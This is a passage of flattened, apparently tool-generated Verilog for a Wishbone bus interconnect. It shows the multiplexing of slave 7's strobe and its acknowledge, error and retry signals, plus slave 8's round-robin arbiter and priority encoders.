    always @ (  ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd7 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd7 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd7 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd7 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd7 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd7 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd7 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd7 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s7_wb_stb_o = ( ( ( m0_slv_sel == 4'd7 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s7_wb_stb_o = ( ( ( m1_slv_sel == 4'd7 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s7_wb_stb_o = ( ( ( m2_slv_sel == 4'd7 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s7_wb_stb_o = ( ( ( m3_slv_sel == 4'd7 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s7_wb_stb_o = ( ( ( m4_slv_sel == 4'd7 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s7_wb_stb_o = ( ( ( m5_slv_sel == 4'd7 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s7_wb_stb_o = ( ( ( m6_slv_sel == 4'd7 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s7_wb_stb_o = ( ( ( m7_slv_sel == 4'd7 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s7_m0_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s7_ack_i );
    assign s7_m1_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s7_ack_i );
    assign s7_m2_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s7_ack_i );
    assign s7_m3_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s7_ack_i );
    assign s7_m4_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s7_ack_i );
    assign s7_m5_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s7_ack_i );
    assign s7_m6_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s7_ack_i );
    assign s7_m7_ack_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s7_ack_i );
    assign s7_m0_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s7_err_i );
    assign s7_m1_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s7_err_i );
    assign s7_m2_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s7_err_i );
    assign s7_m3_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s7_err_i );
    assign s7_m4_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s7_err_i );
    assign s7_m5_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s7_err_i );
    assign s7_m6_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s7_err_i );
    assign s7_m7_err_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s7_err_i );
    assign s7_m0_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s7_rty_i );
    assign s7_m1_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s7_rty_i );
    assign s7_m2_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s7_rty_i );
    assign s7_m3_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s7_rty_i );
    assign s7_m4_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s7_rty_i );
    assign s7_m5_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s7_rty_i );
    assign s7_m6_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s7_rty_i );
    assign s7_m7_rty_o = ( ( ( ( ( s7_pri_sel == 2'd0 ) ) ? ( s7_arb_state ) : ( ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( s7_msel_arb0_state ) : ( ( ( ( s7_msel_pri_sel == 2'd1 ) ) ? ( s7_msel_sel1 ) : ( s7_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s7_rty_i );
    assign s8_wb_data_i = s8_data_i;
    assign s8_data_o = s8_wb_data_o;
    assign s8_addr_o = s8_wb_addr_o;
    assign s8_sel_o = s8_wb_sel_o;
    assign s8_we_o = s8_wb_we_o;
    assign s8_cyc_o = s8_wb_cyc_o;
    assign s8_stb_o = s8_wb_stb_o;
    assign s8_wb_ack_i = s8_ack_i;
    assign s8_wb_err_i = s8_err_i;
    assign s8_wb_rty_i = s8_rty_i;
    always @ (  posedge clk_i)
    begin
        s8_next <=  ~( s8_wb_cyc_o);
    end
    assign s8_arb_req = { m7_s8_cyc_o, m6_s8_cyc_o, m5_s8_cyc_o, m4_s8_cyc_o, m3_s8_cyc_o, m2_s8_cyc_o, m1_s8_cyc_o, m0_s8_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s8_arb_state <= s8_arb_grant0;
        end
        else
        begin 
            s8_arb_state <= s8_arb_next_state;
        end
    end
    always @ (  s8_arb_state or  { m7_s8_cyc_o, m6_s8_cyc_o, m5_s8_cyc_o, m4_s8_cyc_o, m3_s8_cyc_o, m2_s8_cyc_o, m1_s8_cyc_o, m0_s8_cyc_o } or  1'b0)
    begin
        s8_arb_next_state = s8_arb_state;
        case ( s8_arb_state ) 
        s8_arb_grant0:
        begin
            if (  !( s8_arb_req[0]) | 1'b0 ) 
            begin
                if ( s8_arb_req[1] ) 
                begin
                    s8_arb_next_state = s8_arb_grant1;
                end
                else
                begin 
                    if ( s8_arb_req[2] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant2;
                    end
                    else
                    begin 
                        if ( s8_arb_req[3] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant3;
                        end
                        else
                        begin 
                            if ( s8_arb_req[4] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant4;
                            end
                            else
                            begin 
                                if ( s8_arb_req[5] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[6] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[7] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant1:
        begin
            if (  !( s8_arb_req[1]) | 1'b0 ) 
            begin
                if ( s8_arb_req[2] ) 
                begin
                    s8_arb_next_state = s8_arb_grant2;
                end
                else
                begin 
                    if ( s8_arb_req[3] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant3;
                    end
                    else
                    begin 
                        if ( s8_arb_req[4] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant4;
                        end
                        else
                        begin 
                            if ( s8_arb_req[5] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant5;
                            end
                            else
                            begin 
                                if ( s8_arb_req[6] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[7] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[0] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant2:
        begin
            if (  !( s8_arb_req[2]) | 1'b0 ) 
            begin
                if ( s8_arb_req[3] ) 
                begin
                    s8_arb_next_state = s8_arb_grant3;
                end
                else
                begin 
                    if ( s8_arb_req[4] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant4;
                    end
                    else
                    begin 
                        if ( s8_arb_req[5] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant5;
                        end
                        else
                        begin 
                            if ( s8_arb_req[6] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant6;
                            end
                            else
                            begin 
                                if ( s8_arb_req[7] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[0] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[1] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant3:
        begin
            if (  !( s8_arb_req[3]) | 1'b0 ) 
            begin
                if ( s8_arb_req[4] ) 
                begin
                    s8_arb_next_state = s8_arb_grant4;
                end
                else
                begin 
                    if ( s8_arb_req[5] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant5;
                    end
                    else
                    begin 
                        if ( s8_arb_req[6] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant6;
                        end
                        else
                        begin 
                            if ( s8_arb_req[7] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant7;
                            end
                            else
                            begin 
                                if ( s8_arb_req[0] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[1] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[2] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant4:
        begin
            if (  !( s8_arb_req[4]) | 1'b0 ) 
            begin
                if ( s8_arb_req[5] ) 
                begin
                    s8_arb_next_state = s8_arb_grant5;
                end
                else
                begin 
                    if ( s8_arb_req[6] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant6;
                    end
                    else
                    begin 
                        if ( s8_arb_req[7] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant7;
                        end
                        else
                        begin 
                            if ( s8_arb_req[0] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant0;
                            end
                            else
                            begin 
                                if ( s8_arb_req[1] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[2] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[3] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant5:
        begin
            if (  !( s8_arb_req[5]) | 1'b0 ) 
            begin
                if ( s8_arb_req[6] ) 
                begin
                    s8_arb_next_state = s8_arb_grant6;
                end
                else
                begin 
                    if ( s8_arb_req[7] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant7;
                    end
                    else
                    begin 
                        if ( s8_arb_req[0] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant0;
                        end
                        else
                        begin 
                            if ( s8_arb_req[1] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant1;
                            end
                            else
                            begin 
                                if ( s8_arb_req[2] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[3] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[4] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant6:
        begin
            if (  !( s8_arb_req[6]) | 1'b0 ) 
            begin
                if ( s8_arb_req[7] ) 
                begin
                    s8_arb_next_state = s8_arb_grant7;
                end
                else
                begin 
                    if ( s8_arb_req[0] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant0;
                    end
                    else
                    begin 
                        if ( s8_arb_req[1] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant1;
                        end
                        else
                        begin 
                            if ( s8_arb_req[2] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant2;
                            end
                            else
                            begin 
                                if ( s8_arb_req[3] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[4] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[5] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s8_arb_grant7:
        begin
            if (  !( s8_arb_req[7]) | 1'b0 ) 
            begin
                if ( s8_arb_req[0] ) 
                begin
                    s8_arb_next_state = s8_arb_grant0;
                end
                else
                begin 
                    if ( s8_arb_req[1] ) 
                    begin
                        s8_arb_next_state = s8_arb_grant1;
                    end
                    else
                    begin 
                        if ( s8_arb_req[2] ) 
                        begin
                            s8_arb_next_state = s8_arb_grant2;
                        end
                        else
                        begin 
                            if ( s8_arb_req[3] ) 
                            begin
                                s8_arb_next_state = s8_arb_grant3;
                            end
                            else
                            begin 
                                if ( s8_arb_req[4] ) 
                                begin
                                    s8_arb_next_state = s8_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s8_arb_req[5] ) 
                                    begin
                                        s8_arb_next_state = s8_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s8_arb_req[6] ) 
                                        begin
                                            s8_arb_next_state = s8_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s8_msel_req = { m7_s8_cyc_o, m6_s8_cyc_o, m5_s8_cyc_o, m4_s8_cyc_o, m3_s8_cyc_o, m2_s8_cyc_o, m1_s8_cyc_o, m0_s8_cyc_o };
    assign s8_msel_pri_enc_valid = { m7_s8_cyc_o, m6_s8_cyc_o, m5_s8_cyc_o, m4_s8_cyc_o, m3_s8_cyc_o, m2_s8_cyc_o, m1_s8_cyc_o, m0_s8_cyc_o };
    always @ (  s8_msel_pri_enc_valid[0] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[0]) ) 
        begin
            s8_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[0] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[0]) ) 
        begin
            s8_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[1] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[0] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[1] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[1]) ) 
        begin
            s8_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[1] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[1]) ) 
        begin
            s8_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[3] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[2] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[2] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[2]) ) 
        begin
            s8_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'h1 ) 
                begin
                    s8_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'h2 ) 
                    begin
                        s8_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s8_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[2] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[2]) ) 
        begin
            s8_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[5] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[4] ) ) } == 2'h0 ) 
            begin
                s8_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s8_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s8_msel_pri_enc_valid[3] or  { ( ( ( s8_msel_pri_sel == 2'd2 ) ) ? ( rf_conf8[7] ) : ( 1'b0 ) ), ( ( ( s8_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf8[6] ) ) })
    begin
        if (  !( s8_msel_pri_enc_valid[3]) ) 
        begin
            s8_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
